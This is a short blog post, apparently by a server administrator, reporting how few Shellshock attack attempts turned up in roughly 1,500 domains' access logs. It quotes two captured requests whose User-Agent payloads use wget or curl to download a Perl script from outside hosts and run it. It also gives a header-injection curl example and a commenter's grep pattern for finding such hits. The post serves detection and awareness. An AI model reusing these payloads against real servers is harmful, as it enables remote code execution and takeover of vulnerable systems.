Yes, shellshock is the nickname of the latest big vulnerability after the infamous SSL Heartbleed bug. But is it actually used? Do people attack?
I analyzed the access logs of ~1500 domains and I only found two hits:
109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""
213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.
Update September 22nd 2017: Yes, I know: Kind of a late update. However it is worth to mention that the shellshock attack did work on http header level, too. So even if I couldn't find anything in the access logs (not all headers are logged here), that doesn't mean there were no shellshock-attacks. For example:
$ curl -H "X-Client-Something: Additional Header () { :;}; /bin/bash -c 'whoami'" https://www.example.com
Alexander from Zürich wrote on Sep 26th, 2014:
Easy way to grep:
grep -E '.*"\(' access_log
AWS Android Ansible Apache Apple Atlassian BSD Backup Bash Bluecoat CMS Chef Cloud Coding Consul Containers CouchDB DB DNS Database Databases Docker ELK Elasticsearch Filebeat FreeBSD Galera GlusterFS Grafana Graphics HAProxy HTML Hacks Hardware Icinga Icingaweb Icingaweb2 Influx Internet Java KVM Kibana Kodi Kubernetes LXC Linux Logstash Mac Macintosh Mail MariaDB Minio MongoDB Monitoring Multimedia MySQL NFS Nagios Network Nginx OSSEC OTRS Office PGSQL PHP Perl Personal PostgreSQL Postgres PowerDNS Proxmox Proxy Python Rancher Rant Redis Roundcube SSL Samba Seafile Security Shell SmartOS Solaris Surveillance Systemd TLS Tomcat Ubuntu Unix VMWare VMware Varnish Virtualization Windows Wireless Wordpress Wyse ZFS Zoneminder